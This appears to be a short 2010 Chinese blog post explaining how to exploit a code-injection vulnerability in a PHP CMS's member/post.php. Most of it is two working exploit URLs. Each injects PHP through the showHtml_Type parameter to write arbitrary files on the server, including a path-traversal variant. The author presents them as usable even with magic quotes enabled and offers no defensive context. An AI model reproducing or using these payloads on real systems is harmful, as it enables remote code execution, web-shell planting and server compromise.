Tags: Posted in 网络安全 1条留言

一个朋友发来这个漏洞,说是不好利用
漏洞描述给出的例子phpinfo()简直是糊弄人的
我看了下漏洞的代码,试了下,如下方法可以利用,在魔术引号开了的情况下也可

我试出两种方式:
http://www.XXXX.com/member/post.php?only=1&showHtml_Type[bencandy][1]={${$ppp = fopen(‘xixi.php’,'w’) and fwrite($ppp,’test’) and print(’111′) and ($filename_b = stripcslashes($filename_b))}}&aid=1&job=endHTML
这种会执行两次,第二次会成功

http://www.XXXX.com/member/post.php?only=1&showHtml_Type[bencandy][1]={${$ppp = fopen(stripcslashes($_GET[path]),’w') and fwrite($ppp,’hello’) and print(’111′) and ($filename_b = stripcslashes(null))}}&aid=1&job=endHTML&path=./../index1.php
这种只执行一次,不过自己得多写个参数

九月 13, 2010 03:09:38